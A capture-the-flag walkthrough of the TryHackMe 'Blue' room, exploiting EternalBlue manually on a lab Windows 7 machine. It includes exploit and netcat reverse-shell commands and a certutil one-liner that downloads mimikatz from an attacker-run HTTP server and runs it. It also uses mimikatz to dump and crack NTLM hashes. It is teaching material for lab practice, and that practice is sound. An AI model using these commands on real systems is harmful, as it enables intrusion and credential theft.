TryHackMe "Blue" Eternalblue Exploitation without Metasploit

Hey everyone! Continuing on with our push to teach folks to exploit lab machines without relying on Metasploit, I've decided to show you how to exploit Blue (https://tryhackme.com/room/blue).  Blue is one of those rights of passage in the capture the flag realm, exploiting the Eternalblue vulnerability.  We will be doing this manually today with a tool called Autoblue, which works really well when it works correctly.  There won't be any post exploitation with this machine today as it's a Windows 7 OS, however you can use what we've covered in the past if you would like to continue exploitation past completing the challenge.  So without further delay, let's get started!

Scanning

As usual, we get things started with an Nmap scan followed by the more thorough -A scan.

nmap 10.10.211.204

nmap -A 10.10.211.204

We can see that SMB is running on 445, and that the system is running Windows 7.  Anytime we see Windows 7 and SMB in the same place we need to strongly consider scanning the machine to see if it is vulnerable to Eternal Blue or other vulnerabilities affecting the older operating systems.  We can do this using Nmap as well.

nmap --script vuln 10.10.211.204

And as we can see the machine is vulnerable to Eternalblue (MS17-010).  Being as this is a guide on how to manually exploit Eternalblue we'll need to do some research.  So I will see you in the next section.

Enumeration

Now that we know the machine may be vulnerable to Eternalblue we can find an exploit.  In this case we will use Google to search for a manual Eternalblue exploit, and as you will see we have found one.

Google search on manual eternalblue exploit; Notice the link selected

We will want to visit the above link which is hosting the exploit on Github.  Below you can see some information about it.  When you're done reading and taking notes on how to use the exploit, git clone it to your machine in a working directory of your choice.

Exploit information and clone link

Inside the package is a Python script named eternal_checker.py.  We can run this for a final confirmation that the target is vulnerable, which it reports that it is.  After this we can move on to exploitation.

python eternal_checker.py 10.10.211.204 reporting Target is not patched

Exploitation

Per the instructions, we will first need to change to the shellcode directory and run the shell_prep script.  Do this and ensure that you follow the instructions precisely as shared in the image below.  Failure to do so will result in the exploit not functioning properly, and it may crash the machine.  You may have to run the exploit a few times as well in order for it to work as intended (common Eternalblue issue).

./shell_prep.sh instruction setup

Bottom - nc -nlvp 2246 Listener to System shell; Top - python eternalblue_exploit7.py 10.10.170.114 shellcode/sc_all.bin

We now have a command shell in the machine with system level access privileges. The room requires us to grab the NTLM hashes for the users and crack the Jon user hash, but we really can't do that alone.  We will need a tool like Mimikatz to help us.  You can locate this tool utilizing the "locate mimikatz" command in a Linux terminal.  Once you have located the .exe version of it (located in Responder if you have it installed), you can copy it to your working directory and start a Python SimpleHTTPServer to pull it over.  We will be using certutil.exe this time to pull the file as Powershell is being uncooperative on the older version of Windows.

Right - python -m SimpleHTTPServer 8080 (notice files are pulled after running command in Windows); Left - certutil.exe -urlcache -split -f http://10.11.1.198:8080/mimikatz.exe mimikatz.exe & mimikatz.exe

So the certutil.exe command is a mouthful, and what it is doing is pulling the file from our server, naming it mimikatz.exe, and then running it after the ampersand.  You'll notice that we have a Mimikatz command line, which will allow us to grab the NTLM hash we need.  We can this by doing the following:

lsadump::sam

Now that you have the hash for Jon you can go about trying to grab the decrypted value a couple different ways.  I tend to try an online resource like CrackStation first, and if that doesn't work bruteforce it with Hashcat or John.  In this case CrackStation did the trick.

CrackStation NTLM hash cracked successfully

Finally we are instructed to locate the three additional flags on the machine and submit their values to the dashboard.  I'll leave to you where they are exactly, however I have shared the command on how to search the system to locate them. 

dir /s /p *flag*

Final Thoughts

This was a really fun challenge to take on manually due to the ease it presents using Metasploit.  Manual exploitation of it is pretty straight forward, however you may need to be patient and run the exploit several times before it functions properly.  Additionally you could upload an msfvenom payload to the machine to provide a more secure shell, as you'll have issues if you accidentally close your initial shell, and will need to run the exploit again to regain access.

I hope this walkthrough has been valuable for you as it has been for me.  I'll see you again soon!